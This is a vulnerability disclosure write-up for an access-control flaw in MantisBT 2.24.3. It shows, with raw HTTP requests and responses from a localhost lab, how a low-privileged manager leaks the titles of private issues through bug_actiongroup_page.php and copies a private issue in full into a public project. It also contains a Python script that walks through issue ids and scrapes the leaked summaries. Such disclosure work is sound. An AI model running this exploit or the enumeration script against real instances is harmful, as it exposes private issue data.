### Initialize

- As admin, create two projects: one public and one private.

### Access? What access

- Log in as the manager (in this scenario the manager is the attacker).
- To prove that the attacker currently has no access, visit:
  - [http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2](http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2) - the private project
  - [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1) - an issue belonging to the private project
- Both should return ``Access Denied.``

### Initialize scenario

- As admin, report an issue to the private project.

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------373865978329646363701737804542
Content-Length: 2515
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=2; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3A-2; PHPSESSID=cbhds6ef6rlv01qob6eck59mjk; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=d4bc9ab210dcc813246fd03cd1c352ee0904b8196eafc0fa7a1572d1838dbaa6; MANTIS_BUG_LIST_COOKIE=1
Upgrade-Insecure-Requests: 1

-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="bug_report_token"

20200927nVFRNDA3foc7zbvDhVjrA1a8sWl3Fe_S
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="m_id"

0
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="project_id"

2
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="category_id"

1
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="reproducibility"

90
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="severity"

20
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="priority"

20
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="platform"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="os"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="os_build"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="handler_id"

1
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="summary"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="description"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="steps_to_reproduce"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="additional_info"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="tag_string"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="tag_select"

0
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="max_file_size"

5000000
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="view_state"

10
-----------------------------373865978329646363701737804542--
```

**Response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:29:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:29:50 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:29:50 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10556
Connection: close
Content-Type: text/html; charset=UTF-8

MantisBT
```

### Attacker init

> This is just additional information; you can disregard this issue. Because of internet connection issues I noticed that when the attacker visits http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id= the project title can be disclosed: it returns ``access denied`` but the dropdown for projects renders the title of the project.

- There are two ways to initialize for the attacker: either the attacker already has an old report, or the attacker reports a new issue. I will just create a new issue.

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573
Content-Length: 2423
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="bug_report_token"

20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="m_id"

0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="project_id"

1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="category_id"

1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="reproducibility"

10
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="severity"

20
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="priority"

30
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="platform"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os_build"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="handler_id"

2
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="summary"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="description"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="steps_to_reproduce"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="additional_info"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_string"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_select"

0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="max_file_size"

5000000
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="view_state"

10
-----------------------------427049419225960153701985913573--
```

**Response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:34:54 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:34:54 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10525
Connection: close
Content-Type: text/html; charset=UTF-8

MantisBT
```

### Launch attack

- As manager, go to your own issue: [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8)
- Two vulnerable functions here are ``Move`` and ``Delete``; let's start with the ``Move`` functionality.

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE
```

- Just change ``bug_arr%5B%5D=`` to ``7`` (the private issue) and the confirmation page will render the summary/title of that issue, even though the attacker cannot view it through ``view.php``.
- The ``Delete`` functionality is almost the same.

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE
```

- Take note that you can't actually move or delete these issues; confirming the action returns ``You did not have appropriate permissions to perform that action.`` However, by then it is too late: the summary/title has already leaked on the confirmation page. The permission check is applied to the action, not to the rendering of the selected issues.

### Copying issues: For fun fun fun!

- In this part the attacker manages to **fully leak** the issue.
- As the malicious actor, go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184)
- Look at the ``Viewing issues`` part: the ``select all`` checkbox and the action dropdown.
- The problem in this dropdown is the ``Copy`` functionality.

> Note: I noticed that the ``Assigned to Me (Unresolved)`` filter sends a different set of parameters; ``bug_arr_all=all`` is required. Select ``Assigned to Me (Unresolved)`` and compare with ``Unassigned``, which doesn't send ``bug_arr_all=all``.

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=COPY
```

**Normal response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:50:18 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:50:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11551
Connection: close
Content-Type: text/html; charset=UTF-8

MantisBT

Copy issues to

Copy issues to
Selected Issues
0000008 Hello I am the attacker
```

- Change the value of ``bug_arr%5B%5D=`` to ``7``.

**Exploit request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=7&bug_arr_all=all&action=COPY
```

**Exploit response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:51:40 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:51:40 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:51:40 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11070
Connection: close
Content-Type: text/html; charset=UTF-8

MantisBT

Copy issues to

Copy issues to
Selected Issues
0000007 This is my private issue please dont access me
```

- The browser is now on the ``bug_actiongroup_page.php`` confirmation page, with the private issue listed as selected.
- Click ``Copy issues``. The target project is the attacker's own public project (``project_id=1``).

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1
```

**Response**

```
HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 23:56:39 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:56:39 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
```

- Unlike ``Move`` and ``Delete``, the copy is not rejected: the 302 back to ``view_all_bug_page.php`` means the private issue has been copied into project 1, which the attacker can read. We have finally leaked the full information of a private issue (summary, description, steps to reproduce and additional information)!
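The two manual steps above (swapping ``bug_arr[]`` on the Move/Delete confirmation page, and on the Copy confirmation page) generalise to an enumeration: replay the same ``bug_actiongroup_page.php`` request for a range of issue ids and scrape whatever summaries the confirmation page renders. The script below is an added example for this write-up; it is not code from the write-up or from MantisBT. It assumes that login is a single POST of ``username`` and ``password`` to ``login.php``, that the confirmation page lists each selected issue in its own table row or list item as a zero-padded 7-digit id followed by the summary (as in the rendered output above), and that the page may differ in markup from the constructed ``SAMPLE_PAGE`` used here as a stand-in. The ``action`` value defaults to ``COPY`` but can be any of the dropdown actions.

```python
"""
Enumerate private issue summaries through MantisBT 2.24.3's
bug_actiongroup_page.php (added example, not MantisBT code).

Assumptions (not verified against the real markup): login.php accepts
username/password in one POST; the confirmation page renders one issue per
<tr> or <li> as "0000007 <summary>". SAMPLE_PAGE below is constructed.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# One rendered entry: zero-padded 7-digit id, whitespace, summary.
ROW_RE = re.compile(r"^(\d{7})\s+(.+)$")
# Boundaries between rendered entries (table rows or list items).
SPLIT_RE = re.compile(r"</tr>|</li>", re.IGNORECASE)


def extract_selected_issues(markup: str) -> dict:
    """Return {bug_id: summary} for every issue listed on the confirmation page."""
    found = {}
    for chunk in SPLIT_RE.split(markup):
        # Drop tags (so hidden-input tokens and hrefs never match), unescape, squash whitespace.
        text = html.unescape(re.sub(r"<[^>]+>", " ", chunk))
        text = re.sub(r"\s+", " ", text).strip()
        m = ROW_RE.match(text)
        if m:
            found[int(m.group(1))] = m.group(2)
    return found


def encode_form(fields: dict) -> str:
    """Form-encode exactly as the browser did: bug_arr[] becomes bug_arr%5B%5D."""
    return urllib.parse.urlencode(fields, doseq=True)


def make_session() -> urllib.request.OpenerDirector:
    """Opener with a cookie jar so PHPSESSID and MANTIS_STRING_COOKIE persist."""
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))


def post(opener, url: str, fields: dict) -> str:
    req = urllib.request.Request(url, data=encode_form(fields).encode(), method="POST")
    try:
        with opener.open(req) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:  # still parse error pages; they just yield nothing
        return exc.read().decode("utf-8", "replace")


def login(opener, base_url: str, username: str, password: str) -> None:
    # Assumption: single-step login; adjust if the instance uses the two-page form.
    post(opener, f"{base_url}/login.php",
         {"username": username, "password": password, "return": "index.php"})


def probe_issue(opener, base_url: str, bug_id: int, action: str = "COPY"):
    """Replay the write-up's request for one id; return the leaked summary or None."""
    page = post(opener, f"{base_url}/bug_actiongroup_page.php",
                {"bug_arr[]": [str(bug_id)], "bug_arr_all": "all", "action": action})
    return extract_selected_issues(page).get(bug_id)


def enumerate_issues(opener, base_url: str, id_range, action: str = "COPY") -> dict:
    """Probe every id in id_range; keep only those whose summary was rendered."""
    leaked = {}
    for bug_id in id_range:
        summary = probe_issue(opener, base_url, bug_id, action)
        if summary is not None:
            leaked[bug_id] = summary
    return leaked


# Constructed stand-in for the confirmation page (not a real capture).
SAMPLE_PAGE = """<html><head><title>Copy issues to</title></head><body>
<form action="bug_actiongroup.php" method="post">
<input type="hidden" name="bug_actiongroup_COPY_token" value="TOKEN" />
<table class="table">
<tr><td class="category" colspan="2">Selected Issues</td></tr>
<tr><td><a href="view.php?id=7">0000007</a></td><td>This is my private issue please dont access me</td></tr>
<tr><td><a href="view.php?id=8">0000008</a></td><td>Hello I am the attacker</td></tr>
<tr><td>Project</td><td><select name="project_id"><option value="1">Public project</option></select></td></tr>
</table>
<input type="submit" value="Copy issues" />
</form></body></html>"""


if __name__ == "__main__":
    import os
    base = os.environ.get("MANTIS_URL", "http://localhost/mantisbt/mantisbt-2.24.3")
    opener = make_session()
    login(opener, base, os.environ["MANTIS_USER"], os.environ["MANTIS_PASS"])
    for bug_id, summary in enumerate_issues(opener, base, range(1, 51)).items():
        print(f"{bug_id:07d} {summary}")
```

Run it as the low-privileged manager account with ``MANTIS_USER``/``MANTIS_PASS`` set; every id it prints should, for comparison, return ``Access Denied.`` from ``view.php?id=N``. The script only scrapes the confirmation page and never submits ``bug_actiongroup.php``, so nothing is copied or modified on the target.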
### It's too late

The following actions let me disclose the title; all of them go through ``bug_actiongroup_page.php``.

**This is the overall request; only the ``action`` value differs**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION
```

This section is called "too late" because the server does refuse the action itself, but only after the confirmation page has already rendered the summary of an issue the user is not allowed to view. The check that is missing is a per-issue view-access check on every id in ``bug_arr[]`` before anything about the issue is rendered; the per-action permission check that follows cannot undo the disclosure.

- move issues returns ``You did not have appropriate permissions to perform that action.``
- assign issues returns ``You did not have appropriate permissions to perform that action.``
- close issue returns ``You did not have appropriate permissions to perform that action.``
- delete issue returns ``You did not have appropriate permissions to perform that action.``
- resolve issues returns ``You did not have appropriate permissions to perform that action.``
- set sticky returns ``You did not have appropriate permissions to perform that action.``
- update priority returns ``You did not have appropriate permissions to perform that action.``
- update severity returns ``Access Denied.``
- update status returns ``You did not have appropriate permissions to perform that action.``
- update view returns ``You did not have appropriate permissions to perform that action.``
- add note returns ``Access Denied.``
- attach tags returns ``Attach permission denied.``